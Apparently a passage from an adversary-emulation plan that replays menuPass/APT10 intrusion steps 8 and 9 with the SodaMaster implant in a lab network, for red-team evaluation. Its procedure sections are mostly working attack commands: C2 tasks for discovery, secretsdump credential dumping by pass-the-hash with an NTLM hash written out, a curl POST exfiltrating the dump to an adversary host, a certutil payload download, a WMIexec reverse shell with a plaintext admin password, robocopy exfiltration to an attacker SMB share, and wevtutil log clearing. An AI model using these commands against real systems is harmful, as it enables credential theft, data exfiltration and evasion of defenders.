SodaMaster checks registry via RegOpenKeyEx API (anti-vm) RegistryCheck T1082 System Information Discovery JSAC-jpcert
SodaMaster checks expected time between sleeps (anti-vm) CheckExpectedTime T1497.003 Time Based Evasion JSAC-jpcert
SodaMaster executes PowerShell via CreateProcess API ExecutePowerShellCmd T1059.001 Command and Scripting Interpreter: PowerShell JSAC-jpcert
SodaMaster adds itself to Defender's whitelist via Add-MpPreference defenderWhitelist T1562.001 Impair Defenses: Disable or Modify Tools JSAC-jpcert
SodaMaster communicates over TCP SendData T1095 Non-Application Layer Protocol JSAC-jpcert

# Step 8 - Discovery and Additional Privilege Escalation

# 🎤 Voice Track

menuPass uses SodaMaster to execute discovery actions, which will result in menuPass discovering a file server alphamon ( and its administrator kmimi on Subsidiary B’s network. SodaMaster creates threads for executing downloaded shellcode in memory.

To prepare to laterally move onto the file server, menuPass uses SodaMaster to download secretsdump.exe, which is Impacket's secretsdump.py converted to an executable binary using PyInstaller. SodaMaster executes secretsdump.exe to dump the SYSTEM/SECURITY/SAM hives on the bastion workstation kimeramon (, authenticating using the NTLM hash for kizumi.da collected previously.

The retrieved dump contains a cached domain login for kmimi, the file server administrator in Subsidiary B which is cracked to reveal kmimi's plaintext password.

# ☣️ Procedures

  • Using SodaMaster, execute the discovery actions shellcode. Wait until each command has returned before executing the next.

    • netstat -anop tcp

      ./evalsC2client.py --set-task 2ef436e5400781c2f6611c31d4ef79b8 '{"id":"s", "args":"netstat -anop tcp"}'
      • Verify a network connection to alphamon ( port 445
    • tasklist /v

      ./evalsC2client.py --set-task 2ef436e5400781c2f6611c31d4ef79b8 '{"id":"s", "args":"tasklist /v"}'
      • Verify that the enumerated processes output contains a process running under kmimi
    • net view /all

      ./evalsC2client.py --set-task 2ef436e5400781c2f6611c31d4ef79b8 '{"id":"s", "args":"net view /all"}'
      • Verify the output contains a list of file shares with the file server host alphamon (
    • net user kmimi /domain

      ./evalsC2client.py --set-task 2ef436e5400781c2f6611c31d4ef79b8 '{"id":"s", "args":"net user kmimi /domain"}'
      • Verify that File Server Admins is listed as one of the groups that kmimi is a member of
  • Using SodaMaster, download and execute secretsdump.exe, using the NTLM hash for kizumi.da collected in step 5

    ./evalsC2client.py --set-task 2ef436e5400781c2f6611c31d4ef79b8 '{"id":"s", "payload":"secretsdump.exe", "payloadPath":"C:/Windows/Temp", "args":"C:/Windows/Temp/secretsdump.exe digirunaway/kizumi.da@ -hashes :6265fbabbdaa3ee71df61bd9f3c77d68 > C:/Windows/Temp/tmp4541 && echo Done"}'
  • Using SodaMaster, curl the secretsdump output to exfiltrate the file

    ./evalsC2client.py --set-task 2ef436e5400781c2f6611c31d4ef79b8 '{"id":"s", "args":"curl -X POST -H 'filename:sdump.txt' --data-binary @C:/Windows/Temp/tmp4541 http://ten-cent.us/uploads"}'
  • Confirm secretsdump output file was exfiltrated in the C2 server log then check for presence of a cached domain login for kmimi in the output:

    cat files/sdump.txt | grep -a kmimi

ℹ️ This hash is cracked to retrieve the plaintext password for kmimi

# 🔍 Reference Code & Reporting

  1. https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/
  2. http://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf
  3. https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
  4. https://www.trendmicro.com/ja_jp/research/21/l/Sigloader-by-Earth-Tengshe.html
  5. https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks
  6. https://cycraft.com/download/Smokescreen_Supply_Chain_Attack_Targets_Taiwan_Financial_Sector_A_Deeper_Look.pdf
:link: Click to expand source code links table

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

Red Team Activity Source Code Link ATT&CK Technique Relevant CTI Report
SodaMaster execute commands via sRDI ExecShellcode T1620 Reflective Code Loading JSAC-jpcert
SodaMaster executes netstat -anop tcp - T1049 System Network Connections Discovery JSAC-jpcert
SodaMaster executes tasklist /v - T1057 Process Discovery JSAC-jpcert
SodaMaster executes net view /all - T1135 Network Share Discovery JSAC-jpcert
SodaMaster executes net user kmimi /domain - T1087.002 Account Discovery: Domain Account JSAC-jpcert
SodaMaster downloads secretsdump.exe ExecShellcode T1105 Ingress Tool Transfer JSAC-jpcert
SodaMaster executes secretsdump.exe with kizumi.da hash - T1550.002 Use Alternate Authentication Material: Pass the Hash JSAC-jpcert
secretsdump.exe dumps local SAM hashes impacket T1003.002 OS Credential Dumping: Security Account Manager pwc
secretsdump.exe dumps cached domain login information impacket T1003.005 OS Credential Dumping: Cached Domain Credentials pwc
secretsdump.exe dumps LSA secrets impacket T1003.004 OS Credential Dumping: LSA Secrets pwc
SodaMaster executes curl to exfiltrate the dump output - T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol pwc

# Step 9 - Data Collection & Exfiltration

# 🎤 Voice Track

menuPass uses SodaMaster to first download a modified WMIexec.vbs to C:\Users\kmimi\appdata\local\temp\w.vbs on the bastion workstation kimeramon ( Then, menuPass executes w.vbs with the cracked plaintext password of the file server administrator kmimi to connect to the file server alphamon (

menuPass uses the reverse shell on the file server alphamon ( to execute several PowerShell commands to enumerate and identify files of interest. menuPass then uses certutil to download WinRAR.exe to the file server alphamon ( to C:\Program Files\conhost.exe. Then, menuPass executes WinRAR to compress files of interest. menuPass exfiltrates the compressed files using RoboCopy to an adversary controlled SMB share.

Once exfiltration of files is complete, menuPass clears the Windows event logs on the file server and command history.

# ☣️ Procedures

  • ➡️ Return to the RDP session on the Kali attack host kraken (

  • Open a terminal window and start the SMB server:

    sudo mkdir /opt/menu_pass/digirevenge
    sudo impacket-smbserver digirevenge /opt/menu_pass/digirevenge -smb2support
  • Using SodaMaster, download WMIexec.vbs to the bastion workstation kimeramon (

    ./evalsC2client.py --set-task 2ef436e5400781c2f6611c31d4ef79b8 '{"id":"s", "payload":"w.vbs", "payloadPath":"C:/Users/kmimi/appdata/local/temp/"}'
  • Initiate an RDP session to the bastion workstation kimeramon ( using the file server administrator kmimi credentials to authenticate.

    Username Password
    DIGIREVENGE\kmimi cHjc3p3hJHJYPUzT@
  • Using the RDP session, open a Command Prompt then execute WMIexec.vbs with the file server administrator kmimi credentials targeting the file server alphamon (

    cscript.exe C:\Users\kmimi\appdata\local\temp\w.vbs /shell DIGIREVENGE\kmimi cHjc3p3hJHJYPUzT@
  • Using the reverse shell to the file server, execute PowerShell file discovery commands

    powershell.exe "Get-SmbShare | foreach-object -process { if($_.Path) { dir $_.Path } }" -wait4145
  • Using the reverse shell to the file server, execute certutil.exe to download WinRAR.exe to the file server from the adversary server

    certutil.exe -urlcache -f http://ten-cent.us/files/giag1.crl "C:\Program Files\conhost.exe"
  • Using the reverse shell to the file server, execute WinRAR.exe to compress each file path containing files of interest

    cd "C:\Program Files"
    conhost.exe a -r C:\Windows\Temp\wmilog.rar F:\data
  • Using the reverse shell to the file server, mount an adversary controlled SMB share then execute the RoboCopy utility to exfiltrate the RAR to the adversary controlled SMB share

    net use \\manhwajia.au\digirevenge & robocopy C:\Windows\Temp \\manhwajia.au\digirevenge wmilog.rar /mt /z
  • ➡️ Switch to an open terminal in Kali and confirm the exfiltration was successful

    ls -l /opt/menu_pass/digirevenge
  • ➡️ Return to the RDP with the reverse shell and, using the reverse shell to the file server, execute the wevtutil utility to clear Windows event logs

    for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" -wait4145
  • Exit the shell

  • Close the Command Prompt then disconnect from the RDP session

# 🔍 Reference Code & Reporting

  1. https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/
  2. http://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf
  3. https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
  4. https://www.trendmicro.com/ja_jp/research/21/l/Sigloader-by-Earth-Tengshe.html
  5. https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks
  6. https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
:link: Click to expand source code links table

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

Red Team Activity Source Code Link ATT&CK Technique Relevant CTI Report
SodaMaster downloads WMIexec.vbs ExecShellcode T1105 Ingress Tool Transfer JSAC-jpcert
WMIexec.vbs creates a remote WMI connection to the file server wmiexec.vbs T1047 Windows Management Instrumentation pwc
WMIexec.vbs establishes reverse shell wmiexec.vbs T1059.003 Command and Scripting Interpreter: Windows Command Shell pwc
Reverse shell executes PowerShell wmiexec.vbs T1059.001 Command and Scripting Interpreter: PowerShell pwc
Reverse shell uses PowerShell to enumerate file shares wmiexec.vbs T1135 Network Share Discovery pwc
Reverse shell uses PowerShell to enumerate files on discovered file shares wmiexec.vbs T1039 Data from Network Shared Drive pwc
certutil.exe downloads WinRAR.exe - T1105 Ingress Tool Transfer Symantec
WinRAR.exe compresses files of interest - T1560.001 Archive Collected Data: Archive via Utility pwc
robocopy exfiltrates compressed files to adversary SMB share - T1039 Data from Network Shared Drive pwc
List and clear all Windows event logs - T1070.001 Indicator Removal: Clear Windows Event Logs JSAC-jpcert